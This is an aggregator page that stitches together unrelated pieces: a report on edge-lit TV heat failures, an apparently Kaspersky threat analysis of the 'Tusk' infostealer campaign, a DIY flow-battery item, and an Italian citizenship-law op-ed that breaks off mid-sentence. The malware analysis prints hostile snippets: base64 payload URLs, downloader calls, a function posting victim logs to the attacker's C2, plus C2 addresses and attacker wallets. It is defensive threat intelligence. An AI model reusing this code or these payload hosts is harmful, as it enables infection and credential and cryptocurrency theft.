Salta al contenuto principale





Edge-Lit, Thin LCD TVs Are Having Early Heat Death Issues


Canadian consumer goods testing site RTINGS has been subjecting 100 TVs to an accelerated TV longevity test, subjecting them so far to over 10,000 hours of on-time, equaling about six …read more https://hackaday.com/2024/08/15/edge-lit-thin-lcd-tvs-are-h

18214103

Canadian consumer goods testing site RTINGS has been subjecting 100 TVs to an accelerated TV longevity test, subjecting them so far to over 10,000 hours of on-time, equaling about six years of regular use in a US household. This test has shown a range of interesting issues and defects already, including for the OLED-based TVs. But the most recent issue which they covered is that of uniformity issues with edge-lit TVs. This translates to uneven backlighting including striping and very bright spots, which teardowns revealed to be due to warped reflector sheets, cracked light guides, and burned-out LEDs.

Excluding the 18 OLED TVs, which are now badly burnt in, over a quarter of the remaining TVs in the test suffer from uniformity issues. But things get interesting when contrasting between full-array local dimming (FALD), direct-lit (DL) and edge-lit (EL) LCD TVs. Of the EL types, 7 out of 11 (64%) have uniformity issues, with one having outright failed and others in the process of doing so. Among the FALD and DL types the issue rate here is 14 out of 71 (20%), which is still not ideal after a simulated 6 years of use but far less dramatic.
Cracks in the Samsung AU8000's Light Guide Plate (Credit: RTINGS)Cracks in the Samsung AU8000’s Light Guide Plate (Credit: RTINGS)
As part of the RTINGS longevity test, failures and issues are investigated and a teardown for analysis, and fixing, is performed when necessary. For these uniformity issues, the EL LCD teardowns revealed burned-out LEDs in the EL LED strips, with cracks in the light-guide plate (LGP) that distributes the light, as well as warped reflector sheets. The LGPs are offset slightly with plastic standoffs to not touch the very hot LEDs, but these standoffs can melt, followed by the LGP touching the hot LEDs. With the damaged LGP, obviously the LCD backlighting will be horribly uneven.

In the LG QNED80 (2022) TV, its edge lighting LEDs were measured with a thermocouple to be running at a searing 123 °C at the maximum brightness setting. As especially HDR (high-dynamic range) content requires high brightness levels, this would thus be a more common scenario in EL TVs than one might think. As for why EL LCDs still exist since they seem to require extreme heatsinking to keep the LEDs from melting straight through the LCD? RTINGS figures it’s because EL allows for LCD TVs to be thinner, allowing them to compete with OLEDs while selling at a premium compared to even FALD LCDs.

youtube.com/embed/wiO4b37RsIk?…

Gazzetta del Cadavere reshared this.



Tusk: unraveling a complex infostealer campaign


Kaspersky researchers discovered Tusk campaign with ongoing activity that uses Danabot and StealC infostealers and clippers to obtain cryptowallet credentials and system data.

18212962

Summary


Kaspersky Global Emergency Response Team (GERT) has identified a complex campaign, consisting of multiple sub-campaigns orchestrated by Russian-speaking cybercriminals. The sub-campaigns imitate legitimate projects, slightly modifying names and branding and using multiple social media accounts to increase their credibility. In our analysis we observed that all the active sub-campaigns host the initial downloader on Dropbox. This downloader is responsible for delivering additional malware samples to the victim’s machine, which are mostly infostealers (Danabot and StealC) and clippers. Besides this, the actors use phishing to trick users into providing additional sensitive information, such as credentials, which can then be sold on the dark web or used to gain unauthorized access to their gaming accounts and cryptocurrency wallets and drain their funds directly.

We identified three active sub-campaigns (at the time of analysis) and 16 inactive sub-campaigns related to this activity. We dubbed it “Tusk”, as the threat actor uses the word “Mammoth” in log messages of initial downloaders — at least in the three active sub-campaigns we analyzed. “Mammoth” is slang used by Russian-speaking threat actors to refer to victims. Mammoths used to be hunted by ancient people and their tusks were harvested and sold.

Analysis of the inactive sub-campaigns suggests that these are either old campaigns or campaigns that haven’t started yet. In this post, we analyze three most recently active sub-campaigns. Here is the timeline for the sub-campaigns in question:

18212964

Campaign timeline

First sub-campaign (TidyMe)


In this campaign the actor simulated peerme.io, a platform for the creation and management of decentralized autonomous organizations (DAOs) on the MultiversX blockchain. It aims to empower crypto communities and projects by providing tools for governance, funding, and collaboration within a decentralized framework. The malicious website is tidyme[.]io.

18212966

First sub-campaign: malicious and original sites

As you can see in the image above, the malicious website contains a “Download” button instead of the “Create your Team now” button on the legitimate website. Clicking this button sends a request to the webserver with User-Agent as an argument. The webserver uses this data to determine which version of the malicious file to send to the victim. The details are shown in the diagram below:

18212968

Malicious webserver routine to download the appropriate malware version depending on the user’s operating system

This campaign has several malware samples for macOS and Windows, both hosted on Dropbox. In this post we will explore Windows samples only.

In addition to distributing malware, this campaign involves victims connecting their cryptocurrency wallets directly through the campaign’s website. To investigate further, we created a test wallet with a small balance and linked it to the site. However, no withdrawal transactions were initiated in the course of this study. The purpose of this action was to expose the threat actor’s cryptocurrency wallet address for subsequent blockchain analysis.

During our investigation, the threat actors transitioned their infrastructure to the domains tidymeapp[.]io and tidyme[.]app. The domain tidymeapp[.]io now hosts an updated version of the initial downloader, incorporating additional anti-analysis techniques. Despite these changes, its primary objective remains the same: to download and execute subsequent stages. Analysis of these new samples is still underway, nevertheless their IoCs are included in the IoCs section in this report. Details of the analysis for the previous samples from tidyme[.]io are provided below.

Initial downloader (TidyMe.exe)


This sample is an Electron application. After its execution, a CAPTCHA form is displayed and the victim must enter the code to proceed. No malicious activities will be carried out until the victim passes the CAPTCHA check, suggesting that the threat actors added it to prevent execution using automatic dynamic analysis tools (e.g. sandboxes).

18212970

CAPTCHA form

It’s worth mentioning that the CAPTCHA is handled internally in the JavaScript file captcha.js as opposed to being handled by a third party, which suggests the attackers’ intent of making sure the victim executes the sample.

After the user passes the CAPTCHA check, the sample launches the main application interface which resembles a profile page. But even if the user enters some information here, nothing will happen. At the same time, the sample begins downloading the two additional malicious files in the background, which are then executed.

18212972

Main interface for TidyMe.exe

Downloader routine


The tidyme.exe sample contains a configuration file called config.json which contains base64-encoded URLs and a password for archived data decompression, which is used to download the second-stage payloads. Here is the content of the file:
{
"archive": "aHR0cHM6Ly93d3cuZHJvcGJveC5jb20vc2NsL2ZpL2N3NmpzYnA5ODF4eTg4dHprM29ibS91cGRhdGVsb2FkLnJhcj9ybGtleT04N2c5NjllbTU5OXZub3NsY2dseW85N2ZhJnN0PTFwN2RvcHNsJmRsPTE=",
"password": "newfile2024",
"bytes": "aHR0cDovL3Rlc3Rsb2FkLnB5dGhvbmFueXdoZXJlLmNvbS9nZXRieXRlcy9m"
}
The table below lists the decoded URLs:

Field nameDecoded value
Archivehxxps[:]//www.dropbox[.]com/scl/fi/cw6jsbp981xy88tzk3obm/updateload.rar?rlkey=87g969em599vnoslcglyo97fa&st=1p7dopsl&dl=1
Byteshxxp[:]//testload.pythonanywhere[.]com/getbytes/f

The main downloader functionality is stored in preload.js file in two functions,
downloadAndExtractArchive and loadFile. The function downloadAndExtractArchive retrieves the field archive from the configuration file, which is an encoded Dropbox link, decodes it and stores the file from Dropbox to the path %TEMP%/archive-<RANDOM_STRING>. The downloaded file is a password-protected RAR file which will be extracted with the value of the field password in the configuration file, then all .exe files from this archive are executed.
The
loadFile function retrieves the field bytes from the configuration file, decodes it using base64, and sends a GET request to the resulting URL. The response contains a byte array which will be converted to bytes and written to the path %TEMP%/<MD5_HASH_OF_CURRENT_TIME>.exe. Following a successful download, this function decodes the file, appends 750000000 bytes to its end and then executes it.
These two functions, in addition to other functions, are exported, which allows the rendering processes to call them in the file named script.js with some delay after the user passes the CAPTCHA check. Here is the code responsible for calling these functions:
setTimeout(() => {
window.api.downloadAndExtractArchive()
}, 10000)

setTimeout(() => {
window.api.loadFile()
}, 100000)
...
In addition to the two functions above, the sample contains a function called
sendRequest. This function is responsible for sending log messages to the threat actor’s C2 server using HTTP POST messages to the URL hxxps[:]//tidyme[.]io/api.php. Below is the function’s code:async function sendRequest(data) {
const formData = new URLSearchParams();
Object.entries(data).forEach(([key, value]) => {
formData.append(key, value);
});

const response = await fetch('https://tydime.io/api.php', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: formData,
});
return response.json();
}
Here is an example of the data which was passed to the
sendRequest function as arguments:const { v4: uuidv4 } = require('uuid');
const randomUUID = uuidv4();

let data = {
key: "aac1ff44",
type: "customlog",
code: randomUUID,
message: "Нет действия..."
};
The messages sent to the C2 server are in Russian; the table below shows the messages along with the English translation:

Original messageTranslated message
Ошибка при создании буфера из архивных данных:Error when creating a buffer from archived data:
Нет действия…No action…
Создаю директорию.I’m creating a directory.
Получил файл.I received the file.
Записал файл в директорию.I wrote the file to the directory.
Unboxing подъехал.Unboxing has arrived.
Открыл файл.Opened the file.
Не смог открыть файл. Error:Couldn’t open the file. Error:
Глобальная ошибка:Global error:
Нет действия…No action…
Выполняю повторный стук.I knock again.
Не удалось получить файл с сайта! Перезапускаюсь.Failed to get file from site! I’m restarting.
Файл успешно записан на устройство.The file was successfully written to the device.
Раздуваю файл.I’m inflating the file.
Открыл файл.Opened the file.
Неудачное открытие файла, через 4 минуты повторяю…:Unsuccessful file opening, after 4 minutes I repeat…:
Глобальная ошибка:Global error:
Мамонт открыл лаунчер…Mammoth opened the launcher…
Мамонт свернул лаунчер…Mammoth collapsed the launcher…
Мамонт закрыл лаунчер…Mammoth closed the launcher…

The following diagram shows the download routine for this sample:

18212974

Initial downloader routine – TidyMe.exe

In this campaign, both updateload.exe and bytes.exe are the same file with the following hashes:

  • MD5: B42F971AC5AAA48CC2DA13B55436C277
  • SHA1: 5BF729C6A67603E8340F31BAC2083F2A4359C24B
  • SHA256: C990A578A32D545645B51C2D527D7A189A7E09FF7DC02CEFC079225900F296AC


Payload (updateload.exe and bytes.exe)


This sample utilizes HijackLoader, a modular loader with different capabilities such as UAC bypass, various process injection techniques, and inline API hooking evasion. After updateload.exe (or bytes.exe) is dropped and executed, it starts a series of process injections starting with injecting shellcode into cmd.exe, then deletes itself, after which the malicious code injected into cmd.exe injects another shellcode into explorer.exe. Both shellcodes are the 32-bit version. As a result of the injection chain, the final stage is executed in the context of the explorer.exe process, which is a variant of the infostealer malware family StealC. The final payload starts communicating with the threat actor’s C2 server, downloading additional legitimate DLLs to be used during the collection and sending of information about the infected system, including the following:

  • HWID (unique ID for the infected system calculated by the malware from C drive serial number);
  • Build Number (meowsterioland4);
  • Network Info
    • IP;
    • Country;


  • System Summary
    • Hardware ID from the operating system;
    • OS;
    • Architecture;
    • Username;
    • Local time;
    • Installed apps;
    • All users;
    • Current user;
    • Process list;


  • Screenshot.

Then it will start requesting configurations from the C2 server, which is a public IP, for the data to be collected. The following table lists the configurations along with their description:

Configuration nameDescription
browsersData to be collected from browsers
pluginsData to be collected from browser extensions
fpluginN/A
walletsData to be collected for the wallet’s desktop applications


The diagram below illustrates the execution steps for this sample:

18212976

First sub-campaign – updateload.exe

Identifying additional sub-campaigns


Having completed our analysis of the first sub-campaign, we conducted cyberthreat intelligence (CTI) and OSINT activities aiming to collect as much information as possible related to the threat actor and this specific campaign. Looking at the DNS records for the first campaign (TidyMe), we identified MX records with the value _dc-mx.bf442731a463[.]tidyme[.]io. Resolving this domain to an A record returns the IP 79.133.180[.]213. Utilizing Kaspersky Threat Intelligence Portal (TIP), we were able to identify all historical and present domains associated with this IP. Below is a list of all the domains:

Domains
tidyme[.]io
runeonlineworld[.]io
voico[.]io
astrosounsports[.]shop
batverssaports[.]shop
dintrinnssports[.]shop
dustfightergame[.]com
edvhukkkmvgcct[.]shop
gurunsmilrsports[.]shop
izxxd[.]top
partyroyale[.]fun
partyroyale[.]games
partyroyaleplay[.]com
partyroyaleplay[.]io
refvhnhkkolmjbg[.]shop
sinergijiasport[.]shop
supme[.]io
vinrevildsports[.]shop
wuwelej[.]top

From the domains above, only the first three were active during our analysis. We already explored tidyme[.]io, so we’ll discuss the other two active sub-campaigns next.

In addition to the link between the domains and the IP, all three active campaigns imitate legitimate projects and contain a download link to an initial downloader malware. The diagram below shows the correlation between the different campaigns:

18212978

Sub-campaigns correlation

Second sub-campaign (RuneOnlineWorld)


In this campaign, the threat actor was simulating the website of an MMO game. The original website domain is riseonlineworld.com, while the malicious website is runeonlineworld[.]io.

18212980

Second sub-campaign: malicious and original sites

The malicious website contains a download link for the initial downloader, imitating the game launcher. The downloader is hosted on Dropbox and it follows the same logic described in the TidyMe section (the first sub-campaign) to obtain the appropriate downloader for the victim’s operating system. The sample name is RuneOnlineWorld.exe.

Initial downloader (RuneOnlineWorld.exe)


This sample is also an Electron application with mostly the same structure and logic as the initial downloader in the first sub-campaign. There are different URLs in the configuration file, but otherwise most of the changes involve the main interface of the application: it resembles a login page rather than a profile page. Moreover, the login page does actually process the entered data.

18212982

First, the password is checked for complexity. If the check is passed, the username and password are sent to the C2. Then a loading page is displayed which is essentially a mockup to give the background tasks enough time to download the additional malicious files. The following diagram shows the steps taken by the downloader:

18212984

Initial downloader routine – RuneOnlineWorld.exe

First payload (updateload.exe)


In the RuneOnlineWorld campaign the two payloads are no longer the same file. Updateload.exe utilizes HijackLoader and injects code to multiple legitimate programs to evade detection. It starts by injecting code into cmd.exe then to explorer.exe. After that, the malicious code injected into explorer.exe starts communicating with multiple C2 servers to download additional malicious DLL and MSI files and save them to the path C:\Users\<USERNAME>\Appdata\. After downloading the malicious files, explorer.exe executes the MSI files using msiexec.exe and the DLL files using rundll32.exe. The final stage for this sample is multiple infostealers from the malware families Danabot and StealC (injected into explorer.exe). The diagram below shows the execution routine for this sample:

18212986

Second sub-campaign – updateload.exe

Second payload (bytes.exe)


This sample also uses HijackLoader to evade detection, unpacks different stages of the payload and injects them into legitimate processes. First, it creates and injects malicious code into cmd.exe, which injects code into explorer.exe and then into OpenWith.exe — a legitimate Windows process. The malicious code injected into OpenWith.exe downloads the next stage from the threat actor’s C2 (another public IP), decodes it and injects it into another OpenWith.exe instance. In this stage, the payload downloads six files to the directory %APPDATA%\AD_Security\ and creates a scheduled task named FJ_load which will execute the file named madHcCtrl.exe at login for persistence. Here is a list of files downloaded by this stage:

SHA256 hashFile name
f586b421f10b042b77f021463934cfeda13c00705987f4f4c20b91b5d76d476cbufotenine.yml
69a90665113bd73b30360d87f7f6ed2c789a90a67f3b6e86474e21273a64f699madHcCtrl.exe
523d4eb71af86090d2d8a6766315a027fdec842041d668971bfbbbd1fe826722madHcNet32.dll
b7d3bc460a17e1b43c9ff09786e44ea4033710538bdb539400b55e5b80d0b338mvrSettings32.dll
0891edb0cc1c0208af2e4bc65d6b5a7160642f89fd4b4dc321f79d2b5dfc2dccunrar.dll
db4328dfbf5180273f144858b90cb71c6d4706478cac65408a9d9df372a08fc3wickerwork.indd

All of these DLL and EXE files are legitimate, except madHcNet32.dll. The malicious files wickerwork.indd and bufotenine.yml contain encrypted data.

The following diagram shows the steps taken by this sample to extract the final payload:

18212988

Second sub-campaign – bytes.exe

madHcNet32.dll


madHcCtrl.exe loads and executes madHcNet32.dll, which, in turn, utilizes HijackLoader to extract and execute the final payload. After execution, madHcCtrl.exe injects the next stage to cmd.exe, then the final stage is injected to explorer.exe. The final payload is clipper malware written in GO. This sample is based on open-source clipper malware. The following diagram shows the execution steps for this sample:

18212990

Second sub-campaign – madHcNet32.dll

The clipper monitors the clipboard data. If a cryptocurrency wallet address is copied to the clipboard, it substitutes it with the following one:

  • BTC: 1DSWHiAW1iSFYVb86WQQUPn57iQ6W1DjGo

In addition, the sample contains unique strings such as the ones below:

  • C:/Users/Helheim/
  • C:/Users/Helheim/Desktop/clipper no autorun/mainTIMER.go

While searching for samples that contain the same strings, we identified additional samples with different wallet addresses:

  • ETH: 0xaf0362e215Ff4e004F30e785e822F7E20b99723A
  • BTC: bc1qqkvgqtpwq6g59xgwr2sccvmudejfxwyl8g9xg0

We identified some transactions on the second and third wallet addresses. There were no transactions related to the first wallet address at the time of writing this post.

The second wallet was seen active from March 4 to July 31 and received a total of 9.137 ETH. The third one was active between April 2 and August 6 with 0.0209 BTC received in total. Note that these addresses were only observed in the clipper malware. This campaign also utilizes infostealers to steal software-based cryptocurrency wallets which could be used to gain access to the victim’s funds, although we have not seen such activity. In addition, the infostealers collect credentials from browsers and other sources which could allow the threat actor to gain access to other services used by the victim (e.g. online banking systems) or sell the stolen data on the dark web.

Third sub-campaign (Voico)


In this campaign, the threat actor was simulating an AI translator project named YOUS. The original website is yous.ai, while the malicious website is voico[.]io:

18212992

Third sub-campaign: malicious and original sites

Just like the previous two sub-campaigns, the malicious website contains a download link for the initial downloader imitating the application. The downloader is hosted on Dropbox and follows the same logic described in the first sub-campaign to download the appropriate downloader for the victim’s operating system. During our investigation, the malicious website of this campaign ceased to exist. The sample name is Voico.exe.

Initial downloader (Voico.exe)


This sample is also an Electron application with mostly the same structure as the initial downloaders in the previous two sub-campaigns. The downloader logic also remains the same. Most of the changes involve the main interface of the application, and different URLs are contained in the configuration file.

18212994

Voico.exe main interface

In addition to these changes, the sample prompts the victim to fill in a registration form, which doesn’t send the data to the C2. Instead, it passes the user’s credentials to the console.log() function:
// Теперь вы можете использовать эти значения для дальнейшей обработки или отправки на сервер
// <Translation>: Now you can use these values for further processing or sending to the server

console.log('Name:', name);
console.log('Username:', username);
console.log('Native Language:', nativeLanguage);
console.log('Voice:', voice);
console.log('Password:', password);
The following diagram shows the execution routine for this sample:

18212996

Voico.exe execution routine

Both samples in this campaign (updateload.exe and bytes.exe) have very similar behavior to the updateload.exe sample from the second sub-campaign.

Payload (updateload.exe and bytes.exe)


These samples have similar behavior as the updateload.exe sample from the second sub-campaign with one difference: the StealC malware downloaded by them communicates to a different C2 server. Other than that, the whole routine from the updateload.exe and bytes.exe execution to the final payload execution is the same. Here is a diagram of the execution routine for these samples:

18212998

Third sub-campaign – updateload.exe and bytes.exe

Possible other sub-campaigns


During the analysis of this campaign, the analyzed samples were hosted at the following paths on the attacker website: http[:]//testload.pythonanywhere.com/getbytes/f and http[:]//testload.pythonanywhere.com/getbytes/m. We didn’t find any other resources used in the current sub-campaigns (which doesn’t mean they won’t appear in the future). However, we noticed other samples hosted in different paths, unrelated to the ongoing sub-campaigns. The following is a list of paths on the PythonAnywhere website where these samples are hosted:

  • http[:]//testload.pythonanywhere.com/getbytes/s
  • http[:]//testload.pythonanywhere.com/getbytes/h

The hashes of the files in the new paths are already included in the IoCs list below.

Conclusion


The campaign uncovered in this report demonstrate the persistent and evolving threat posed by cybercriminals who are adept at mimicking legitimate projects to deceive victims. By exploiting the trust users place in well-known platforms, these attackers effectively deploy a range of malware designed to steal sensitive information, compromise systems, and ultimately achieve financial gain.

The reliance on social engineering techniques such as phishing, coupled with multistage malware delivery mechanisms, highlights the advanced capabilities of the threat actors involved. Their use of platforms like Dropbox to host initial downloaders, alongside the deployment of infostealer and clipper malware, points to a coordinated effort to evade detection and maximize the impact of their operations. The commonalities between different sub-campaigns and the shared infrastructure across them further suggests a well-organized operation, potentially tied to a single actor or group with specific financial motives. Our detailed analysis of the three active sub-campaigns, from the initial downloader routines to the final payloads, reveals a complex chain of attacks designed to penetrate both Windows and macOS environments.

In addition to the active sub-campaigns, the discovery of 16 inactive sub-campaigns highlights the dynamic and adaptable nature of the threat actor’s operations. These inactive sub-campaigns, which may represent either older campaigns that have been retired or new ones that have not yet been launched, illustrate the threat actor’s ability to rapidly create and deploy new malicious operations, targeting trending topics at the time of campaign. This rapid turnover suggests a well-resourced and agile adversary, capable of quickly shifting tactics and infrastructure to avoid detection and maintain the effectiveness of their campaigns. The presence of these dormant campaigns also indicates that the threat actor is likely to continue evolving their strategies, potentially reactivating these sub-campaigns or launching entirely new ones in the near future. This reinforces the need for continuous monitoring and proactive defense strategies to stay ahead of these evolving threats.

If your company has experienced a cybersecurity incident that requires an immediate response, contact Kaspersky Incident Response service.

Indicators of Compromise

URLs to third party services
URL
hxxp[:]//testload.pythonanywhere.com/getbytes/f
hxxp[:]//testload.pythonanywhere.com/getbytes/h
hxxp[:]//testload.pythonanywhere.com/getbytes/m
hxxp[:]//testload.pythonanywhere.com/getbytes/s
hxxps[:]//www.dropbox.com/scl/fi/cw6jsbp981xy88tzk3obm/updateload.rar?rlkey=87g969em599vnoslcglyo97fa&st=1p7dopsl&dl=1
hxxps[:]//www.dropbox.com/scl/fi/gvlceblluk9thfijhywu2/update.rar?rlkey=ch37ht5fdklng66t04r8h8kaa&st=sddqqvhz&dl=1
https[:]//www.dropbox.com/scl/fi/dcmq2ucpdcsz3zvpeg85i/mediafile.rar?rlkey=ck5oz8qzz6qtz2i6tl273gbf7&st=4t9ecvfd&dl=1
https[:]//www.dropbox.com/scl/fi/qcrl58lus5dmfqo203ly5/mediafile2.rar?rlkey=1hx6glacae5nwcq71nat8oww0&st=ox6nxk7m&dl=1
Network IoCs
Domain or IPDetails
46.8.238.240StealC C2 Server
77.91.77.200Download madHcCtrl files
23.94.225.177StealC C2 Server
89.169.52.59C2
81.19.137.7C2
194.116.217.148C2
85.28.47.139C2
tidyme.ioCampaign main domain
tidyme.appCampaign main domain
tidymeapp.ioCampaign main domain
runeonlineworld.ioCampaign main domain
voico.ioCampaign main domain
astrosounsports.shopInactive sub-campaign
batverssaports.shopInactive sub-campaign
dintrinnssports.shopInactive sub-campaign
dustfightergame.comInactive sub-campaign
edvhukkkmvgcct.shopInactive sub-campaign
gurunsmilrsports.shopInactive sub-campaign
izxxd.topInactive sub-campaign
partyroyale.funInactive sub-campaign
partyroyale.gamesInactive sub-campaign
partyroyaleplay.comInactive sub-campaign
partyroyaleplay.ioInactive sub-campaign
refvhnhkkolmjbg.shopInactive sub-campaign
sinergijiasport.shopInactive sub-campaign
supme.ioInactive sub-campaign
vinrevildsports.shopInactive sub-campaign
wuwelej.topInactive sub-campaign
1h343lkxf4pikjd.dadHosts malicious files (ex. Danabot)
Host IoCs


Hashes for malicious files

SHA256Verdict
0D877B9163241E6D2DF2779D54B9EDA8ABC909F022F5F74F084203134D5866E2HEUR:Trojan.Multi.Penguish.c
142B8D0080DB24246615059E4BADF439F68C2B219C68C7AC7F4D2FC81F5BB9C2UDS:Trojan.Win32.Penguish
1F3AA94FB9279137DB157FC529A8B7E6067CBD1FE3EB13C6249F7C8B4562958AUDS:Trojan.OLE2.Alien.gen
523D4EB71AF86090D2D8A6766315A027FDEC842041D668971BFBBBD1FE826722Trojan.Multi.Penguish.c
5535BF554C8314B500FB9F00D5BDEA0ADE884CB7C74536BDAAFA501361232E73UDS:Trojan.Win32.Penguish
592052016D9621EB369038007AB13B19632B7353FAFB65BD39268796D5237C8CUDS:Trojan-PSW.Win32.Stealer.gen
5E31073312AA132A5C138E3C978EE1F3802A786C23CDF3965BEE0D556B360932UDS:Trojan.Win32.Tusk.b
609129A9188CA3D16832594D44D746D7434E67A99C6DD20C1785AFACE9ED117DUDS:Backdoor.JS.Tusk.a
6B30A6026B7CC60A3CCE4DB9AE2461AF86C3A0EC81D29C3397CFAD69B7878754UDS:Backdoor.JS.Tusk.a
7587BE1D73DD90015C6200921D320FF0EDCEC19D7465B64D8AB8D12767C0F328UDS:Trojan.Win32.Strab.gen
7FBC872542B61D592EFF2AA402D9310DAFDB01F550226588E2D95050BAC434FCUDS:Trojan.Win32.Tusk.a
8265D6A8EB6C308A7B41CF60BA12F4A7E4616F6ACF2736EE42AADCFF336659E3UDS:Trojan.Win32.Tusk.a
B4B929362FB797F99F00B3E94B4BED796AE664A31A4DC5F507672687AD44322EUDS:DangerousObject.Multi.Generic
BAFA7DBE2A5DF97C8574824ABD2AE78FFA0991F916E72DEBC9FC65E593EC2EE8UDS:Trojan.Win32.Agentb.gen
D69A93DF6CAB86B34C970896181BB1B618317E29CA8B5586364256A1D02B7CCAHEUR:Trojan.Win32.Penguish.gen
DB4328DFBF5180273F144858B90CB71C6D4706478CAC65408A9D9DF372A08FC3Trojan.Win32.Tusk.c
F586B421F10B042B77F021463934CFEDA13C00705987F4F4C20B91B5D76D476CUDS:Trojan.Win32.Tusk.d
7B94558257FF060E0B30D08B3F51B0DF6A46458FD5A726F41A48EC5F5675DD8BHEUR:Trojan-PSW.Win32.Agent.gen
3E80405991C6FC66F90435472210E1479B646EAD3A92BD3F28FBA3DD9D640266Trojan.Win32.Tusk.a
F71BB213AE7ABE03E416C650185971C8470C9AB5670E1B2C516D903BC783715BHEUR:Trojan.Win32.Penguish.b
6CC3E6B74D2018CE3D86E6E9DF2846A14CC980E8F95779B3CE4E83BB1CCD72BDTrojan.JS.Tusk.a

Hashes for legitimate files used in the campaigns

SHA256
69A90665113BD73B30360D87F7F6ED2C789A90A67F3B6E86474E21273A64F699
B7D3BC460A17E1B43C9FF09786E44EA4033710538BDB539400B55E5B80D0B338
0891EDB0CC1C0208AF2E4BC65D6B5A7160642F89FD4B4DC321F79D2B5DFC2DCC
9D8547266C90CAE7E2F5F5A81AF27FB6BC6ADE56A798B429CDB6588A89CEC874
7D42E121560BC79A2375A15168AC536872399BF80DE08E5CC8B3F0240CDC693A
CE0905A140D0F72775EA5895C01910E4A492F39C2E35EDCE9E9B8886A9821FB1
4C33D4179FFF5D7AA7E046E878CD80C0146B0B134AE0092CE7547607ABC76A49
EA748CAF0ED2AAC4008CCB9FD9761993F9583E3BC35783CFA42593E6BA3EB393
934D882EFD3C0F3F1EFBC238EF87708F3879F5BB456D30AF62F3368D58B6AA4C
AE3CB6C6AFBA9A4AA5C85F66023C35338CA579B30326DD02918F9D55259503D5
Cryptocurrency wallet addresses
CryptoWallet Address
BTC1DSWHiAW1iSFYVb86WQQUPn57iQ6W1DjGo
BTCbc1qqkvgqtpwq6g59xgwr2sccvmudejfxwyl8g9xg0
ETH0xaf0362e215Ff4e004F30e785e822F7E20b99723A

securelist.com/tusk-infosteale…



Open Source Residential Energy Storage


An L-shaped orange mounting structure with two white reservoirs on top, a set of pumps on the outer bottom edges, and a membrane cell bolted together in the center. The parts are connected by a series of transparent tubes. Battery news typically covers th

An L-shaped orange mounting structure with two white reservoirs on top, a set of pumps on the outer bottom edges, and a membrane cell bolted together in the center. The parts are connected by a series of transparent tubes.

Battery news typically covers the latest, greatest laboratory or industry breakthroughs to push modern devices further and faster. Could you build your own flow battery stationary storage for home-built solar and wind rigs though?

Based on the concept of appropriate technology, the system from the Flow Battery Research Collective will be easy to construct, easy to maintain, and safe to operate in a residential environment. Current experiments are focusing on Zn/I chemistry, but other aqueous chemistries could be used in the future. Instead of an ion exchange membrane, the battery uses readily attainable photo paper and is already showing similar order of magnitude performance to lab-developed cells.

Any components that aren’t off-the-shelf have been designed in FreeCAD. While they can be 3D printed, the researchers have found traditional milling yields better results which isn’t too surprising when you need something water-tight. More work is needed, but it is promising work toward a practical, DIY-able energy storage solution.

If you’re looking to build your own open source wind turbine or solar cells to charge up a home battery system, then we’ve got you covered. You can also break the chains of the power grid with off-the-shelf parts.



Stefano Galieni*

I Giochi olimpici, che hanno visto proporre, in maniera ancora più netta rispetto al passato, la presenza di atlete e atleti con background migratorio, hanno fatto si che, in questo silenzio agostano, sia tornato nel dibattito politico l’annoso tema della riforma della legge sulla cittadinanza, la stantia 91/1992. Va ricordato che a causa di tale normativa, per divenire cittadine/i italiani occorre risiedere per almeno 10 anni continuativi nel “Belpaese”, avere un reddito, una residenza e non aver subito condanne gravi, anche in primo grado. Trascorsi i fatidici 10 anni si può inoltrare la richiesta che viene analizzata dal ministero dell’Interno anche mediante i suoi organismi territoriali, le prefetture. I tempi di attesa, che già erano lunghi nel 1992, sono più che raddoppiati, passano almeno 4 anni prima di ottenere una risposta che non sempre è positiva. La vita privata del richiedente viene scandagliata in nome della “sicurezza nazionale”. Procedure accelerate e speciali possono essere messe in atto per casi individuali, riguardanti persone che si siano distinte per atti di eroismo o per meriti sportivi. Ma neanche per gli atleti e le atlete la vita è facile. Si debbono avere prestazioni da primato, che fino a quando non si diventa cittadini, non sono neanche riconosciute, prima di poter accedere a tale privilegio.

Per chi nasce in Italia da genitori di cui almeno uno è regolarmente residente, la richiesta della cittadinanza può essere fatta – quanta bontà – dal compimento del diciottesimo anno di età per un solo anno e ovviamente senza mai essersi allontanati dal Paese, dopo è troppo tardi. Potrà sembrare un’inezia ma per una ragazza o un ragazzo minorenne che intenda andare in gita scolastica con i propri compagni, tale diritto è spesso negato. Più di una volta si è tentato di modificare una legge basata sullo ius sanguinis – diritto basato sul sangue – (terminologia scientificamente inesistente), per giungere allo ius soli, diritto del suolo, che lega la cittadinanza al luogo di nascita. Destra e sinistra moderata hanno sempre, di fatto, avversato quest’ultima ipotesi. Già nel 1998 l’allora ministro dell’Interno, poi Presidente della Repubblica Giorgio Napolitano, si spingeva ad utilizzare una forma come “ius soli temperato”, secondo cui, per chi era di origine straniera, non era sufficiente essere nato in Italia per acquisire la cittadinanza. La proposta di legge, varata nel 2015 in tal senso prevedeva che chi era nata/o in Italia ne diveniva immediatamente cittadino a condizione che almeno uno dei due genitori fosse in possesso della carta di soggiorno illimitata. Ma anche il possesso di questo prezioso documento non è svincolato da requisiti: residenza continuativa in Italia negli ultimi 5 anni da comprovare attraverso idonea documentazione; reddito annuo pari o superiore all’importo dell’assegno sociale (attualmente €5.983,00), come da disposizioni vigenti. Tale requisito reddituale dovrà essere attestato mediante certificazione unica (CU) o modello Redditi PF; conoscenza della lingua italiana di livello A2 o titolo di studio conseguito in Italia riconosciuto equivalente, salvo nei casi di protezione internazionale; possesso di un valido permesso di soggiorno; assenza di condanne penali, nei Paesi di residenza o cittadinanza.

Anche questa proposta ultramoderata si è arenata al Senato grazie allo strepitare della destra – c’era chi lanciava allarmi relative a barconi con donne in gravidanza, pronte a salpare per l’agognato titolo – ignavia della dirigenza dell’allora M5S, paura del centro sinistra tanto di perdere consensi quanto di essere sconfitto in aula. Quasi un milione di minori perse questa importante occasione di affrancamento. Oggi riparte la bagarre con 2 ulteriori restrizioni già agitate negli ultimi anni: lo ius scholae, del 2022 che mira a concedere la cittadinanza italiana ai minori stranieri nati in Italia o arrivati entro i 12 anni, dopo aver completato un ciclo scolastico di almeno cinque anni o lo ius culturae, parte di un disegno di legge approvato nel 2015 e arenatosi ben presto che prevedeva la concessione della cittadinanza al completamento di un ciclo scolastico con successo, basandosi sul principio che lo straniero debba dimostrare attivamente la sua volontà di integrazione. Le proposte che si vanno confrontando in questi giorni sono al ribasso per convincere parte delle destre a sostenerle e per non ridare fiato a chi lancia l’allarme della “sostituzione etnica” o dell’invasione. Sono proposte col 